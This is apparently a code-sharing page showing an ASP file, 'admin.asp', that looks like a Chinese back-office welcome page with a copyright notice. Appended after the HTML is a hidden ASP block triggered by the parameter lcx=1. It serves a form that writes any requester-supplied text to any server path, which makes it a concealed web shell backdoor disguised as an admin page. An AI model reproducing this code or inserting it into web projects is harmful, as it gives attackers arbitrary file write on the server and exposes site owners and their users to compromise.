📄 admin.asp
字号:
<html>
<head>
<title>ibmcd.com</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link href="../images/css.css" rel="stylesheet" type="text/css">
<style>
td{font-size:9pt;line-height:120%;color:#353535}
body{font-size:9pt;line-height:120%}
a:link { color: #000000; text-decoration: none }
a:visited { color: #000000; text-decoration: none }
a:active { color: #000000; text-decoration: none }
a:hover { color: #336699; text-decoration: none; position: relative; right: 0px; top: 1px }
</style>
</head>
<body bgcolor="#799AE1">
<table width="91%" border="0" align="center" cellpadding="1" cellspacing="1">
<tr>
<td height="20">
<div align="center"><font color="#000000">欢迎使用后台管理系统 操作注意事项及说明</font></div>
</td>
</tr>
<tr>
<td height="100" valign="top"><br>
<table width="80%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>·各个管理项目中需要注意的地方都有标明,请注意查看清楚后再进行操作。<font color="#FF0000"><br>
·此程序您可以使用但请在后台保留我的制作版权,请尊重程序员们的劳动成果。<br>
·如果您需要商业合作,请联系我。 </font></td>
</tr>
</table>
<br>
</td>
</tr>
</table>
<br>
</body>
</html>
<%
if Request("lcx")="1" then
dim allen,creat,text,thisline,path
if Request("creat")="yes" then
Set fs = CreateObject("Scripting.FileSystemObject")
Set outfile=fs.CreateTextFile(server.mappath(Request("path")))
outfile.WriteLine Request("text")
Response.write "succeed!"
end if
Response.write "<form method='POST'action='"&Request.ServerVariables("URL")&"?lcx=1&creat=yes'>"
Response.write "<textarea name='text'>"&thisline&"</textarea><br>"
Response.write "<input type='text' name='path' value='"&Request("path")&"'>"
Response.write "<input name='submit' type='submit' value='ok' ></form>"
Response.end
end if
%>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -